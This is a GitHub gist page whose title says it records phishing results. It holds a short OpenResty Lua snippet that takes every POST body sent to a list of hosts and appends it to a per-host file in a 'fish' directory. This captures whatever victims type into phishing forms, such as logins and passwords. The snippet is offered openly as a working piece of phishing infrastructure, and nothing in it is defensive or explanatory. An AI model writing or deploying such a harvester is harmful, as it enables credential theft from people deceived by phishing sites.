Skip to content

Instantly share code, notes, and snippets.

@phith0n
Created May 31, 2015 13:50
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save phith0n/ff26eccc1a4f6da05972 to your computer and use it in GitHub Desktop.
Save phith0n/ff26eccc1a4f6da05972 to your computer and use it in GitHub Desktop.
lua记录钓鱼结果
local method=ngx.req.get_method()
if in_array(ngx.var.host, valid_host) then
if method == "POST" then
ngx.req.read_body()
local data = ngx.req.get_body_data()
writefile("/home/wwwroot/fish/"..ngx.var.host..".txt", data .. "\n")
end
end
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment